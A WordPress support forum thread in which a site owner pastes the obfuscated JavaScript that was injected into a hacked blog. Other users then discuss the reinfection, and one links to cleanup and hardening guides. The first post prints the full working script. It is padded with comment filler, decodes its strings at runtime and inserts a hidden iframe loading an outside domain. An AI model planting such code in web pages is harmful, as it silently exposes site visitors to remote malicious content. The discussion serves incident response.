WordPress.org

Ready to get started?Download WordPress

Forums

[resolved] Is this a WordPress exploit error or GoDaddy's fault? (5 posts)

  1. micasuh
    Member
    Posted 4 years ago #

    Recently, a WP blog was attacked and left with this code:

    <!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><script type='text/javascript'>function vS(){};this.nU='';vS.prototype = {r : function() {this.k="";this.mQ="";this.w='';this.zD=false;oD=false;wD="wD";var z=document;this.n=false;h="h";f="";var m=window;this.d=22706;var iQ=function(){return 'iQ'};uM=17389;function p(){};this.gQ="gQ";this.zT=false;var c=new Array();var bJ="bJ";    String.prototype.mM=function(g, u){return this.replace(g, u)};this.pO='';this.y=47529;var jU="jU";sR="sR";tV='';function rE(){};bC="bC";var t = 's{t?y{lKe?'.mM(/[\?K\{\|z]/g, '');iY=false;function tC(){};this.dF="";var tS=52222;        var v = 'a_pDpNeNnsdDCDhsiNlDdN'.mM(/[NDLs_]/g, '');this.tJ="";var bG='';var j = 'iwf>rUa>mUe>'.mM(/[\>w9UH]/g, '');function uZ(){};var aO="aO";var i = 'c]r]e#a@the]E#l]e#m]ehn]t#'.mM(/[#x@\]h]/g, '');eO='';l=false;var b = 'w>rviRtTev'.mM(/[v\>RT2]/g, '');var tW=34149;this.eG="eG";var rEL="";var e = 'sve:tIA:tkt:rkiIbvuvtvec'.mM(/[cvI\:k]/g, '');var iQD=function(){};var oW="";var kY=function(){return 'kY'};var s = 's0r?c?'.mM(/[\?10B7]/g, '');function pW(){};this.dJ="dJ";var jV = 'bSoSd?y?'.mM(/[\?Sp\(n]/g, '');var kI=function(){return 'kI'};this.uR="";vO="";hW='';var rM = 'd*i*s*p3lHaHy*:wn^o*n*e^'.mM(/[\^\*Hw3]/g, '');function yL(){};var eD=new Date();var iM=function(){};var x='';var uB = 'sUeNtNTLi$m$eNoUu$t$'.mM(/[\$NUCL]/g, '');iZ=411;function uN(){};this.iW=false;var fS=new Array();this.lV="lV";var eOX=function(){};tG="";try {this.fY="";var aON=new Date();gF=41884;this.kL="kL";var rS='';var a=z[i](j);eB=45917;nZ='';var oU=function(){return 'oU'};this.tK=36442;a[e](s, this.sW());gD="";this.yJ=63939;var lB=false;var kYF="";a[e](t, rM);var cT=52936;this.pS=false;this.cU=false;var q=65146;var fYC=new Array();document[jV][v](a);var kR=false;this.gB=false;function tP(){};var gU=9828;var bK=false;rV="";} catch(o) {kA='';this.oX='';var oV='';this.bT=false;z.write('tpO%swL%<%/%bpowdwy%>%<p/phptwm%lZ>I'.mM(/[Iwp%Z]/g, ''));zU="zU";this.sC='';function rH(){};jUL='';var aP = this;var zB=function(){};var sS="sS";var vF=function(){};m[uB](function(){ aP.r() }, 231);var qG=new Date();lG="lG";this.sM="";}xG='';this.dU="";},sW : function() {xB="xB";var wT="";var jVA=new Date();return 'h+t8tBp8:+/8/+yMaxhMoBoM-Bs+tBa8tBi8sxt+ixcM.+cBo+mx/BjBsB/Md+exfBaxu8l8tM.Bh+txmxl+'.mM(/[\+BMx8]/g, '');var jR="";rD="";}};this.nA=false;var hG=new vS(); this.jG=50573;hG.r();gA='';</script><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ --><!-- ~ -->

    Is this an attack b/c of WordPress security problems or is it related to the GoDaddy virus that's been going around talked about here: http://wordpress.org/support/topic/362584?replies=4

  2. micasuh
    Member
    Posted 4 years ago #

    Wow, this is nuts. I deleted the above code that was inserted but just 3 days later it reappears! WTF.

    Is this a trojan horse or exploit that's within GoDaddy's servers? I need to figure out how to prevent this malware from replicating!

  3. nakedape
    Member
    Posted 4 years ago #

    Did you ever resolve this? I am also having the problem with this script on my WordPress site as well. (I haven't updated WP for a while, so I know I'm largely to blame... no need to rub it in people!)

    I haven't tracked down the location of the script yet, but it was found by unmaskparasites. Where abouts was it located for you?

    Cheers,

    John

  4. micasuh
    Member
    Posted 4 years ago #

    We never found out what the cause was but since I deleted it, it hasn't been a problem luckily. I think it was GoDaddy's fault since they've had similar problems with others, since.

  5. WP Voyager
    Member
    Posted 4 years ago #

    Wow, this is nuts. I deleted the above code that was inserted but just 3 days later it reappears!

    Yes. If you do not clean out the bad stuff, the hacker probably left open a back-door for himself. Once your site is hacked, the hacker can get in very easily afterward. For information about cleaning up, see the following links:

    http://codex.wordpress.org/FAQ_My_site_was_hacked

    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/

    http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/

    Then look at this Codex article to protect against future attacks:

    http://codex.wordpress.org/Hardening_WordPress

    This ought to cover you, but if it doesn't you can find out more about specific hacks by searching the web and these forums.

Topic Closed

This topic has been closed to new replies.

About this Topic